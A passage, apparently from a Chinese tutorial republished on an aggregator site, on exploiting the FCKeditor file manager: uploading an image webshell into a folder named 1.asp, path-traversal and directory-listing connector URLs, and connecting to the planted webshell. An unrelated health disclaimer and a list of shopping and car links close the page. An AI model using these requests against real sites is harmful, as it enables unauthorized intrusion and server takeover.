3.4 文件解析限制
通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的
webshell文件,获取其shell 。
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
4.列目录
4.1 FCKeditor/editor/fckeditor.html
FCKeditor/editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳
转至可上传文件页,可以查看已经上传的文件 。
4.2 根据xml返回信息查看网站目录
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.as
px?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
4.3 获取当前文件夹
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.4 浏览E盘文件
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5. 连接木马
在木马能够解析之后,使用各类工具连接到木马,获取webshell 。至此,利用FCKeditor进行文件上传
并攻击的过程就已经完成
三. 其他
在获取到webshell之后,可以进行的操作非常多,也便于提权操作,拿下主机权限并不困难 。
关于该漏洞的防御,可以删除掉所有的上传点,并限制目录访问 。
以上关于本文的内容,仅作参考!温馨提示:如遇健康、疾病相关的问题,请您及时就医或请专业人士给予相关指导!
「四川龙网」www.sichuanlong.com小编还为您精选了以下内容,希望对您有所帮助:- 二手丰田亚洲龙报价及图片 丰田亚洲龙2.0报价
- 免费一键照片变清晰的app 手机怎么让图片变高清
- 拼多多店铺怎么打造一张超高点击率的主图,提高转化率的图片
- 什么电锤质量好,电锤图片
- 一汽丰田ra∨4多少钱 丰田ra 4新款图片
- word文档转换成图片的方法 怎么把word保存成图片
- 服务器上传文件用的方法 服务器上传文件一般用什么
- 2022支付宝集五福图片大全福字 2022五福敬业福友善福爱国福图片大全
- 自制美味诱人的大披萨 自做披萨图片
- 京东家具城沙发类 「京东沙发图片价格全友」